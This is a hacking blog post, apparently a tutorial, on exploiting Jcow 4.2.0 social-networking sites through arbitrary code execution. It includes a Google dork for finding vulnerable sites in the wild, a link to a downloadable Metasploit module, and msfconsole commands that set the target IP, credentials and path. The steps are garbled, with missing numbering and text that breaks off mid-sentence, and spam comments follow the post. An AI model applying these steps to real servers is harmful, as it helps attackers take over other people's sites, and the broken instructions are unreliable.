After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social networking engine can be exploited and the exploit ranking marked as "excellent".
So actually, what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example, if you hosting your Jcowvulnerable version(on insecure hosting also ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually, it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext: Powered by Jcow 4.2.0" and register as the normal user there. In this tutorial I have already registered as username: victim and password also victim
Okay, I hope you understand what I say above to make it more realistic, let's try the tutorial…
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution |
Level: Medium
Requirement :
2.# Jcow.rb exploit mediafire.com
4 Steps Hacking Jcow Social Networking Web Server via ArbitraryCode Execution Process:
1.#, first of all, you simply Copy thecp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
now you see the text "framework" in blue color it's only because I'm using 2.# now when you copy successfully
msf > use exploit/remote/jcow
Importent:::?msf exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim --> set the username
username => victim
msf exploit(jcow) > set password victim --> set the password
password => victim
msf exploit(jcow) > set uri jcow --> only if jcow not in/directory fill it here
uri => jcow
Set URI can be used if cow was not
4#. now your work has been almost
Great Post.. http://bestdealssite.com/cyber-monday-cell-phones-iphone-smartphone-deals-2017/
BalasHapuscyber monday smartphone deals
BalasHapus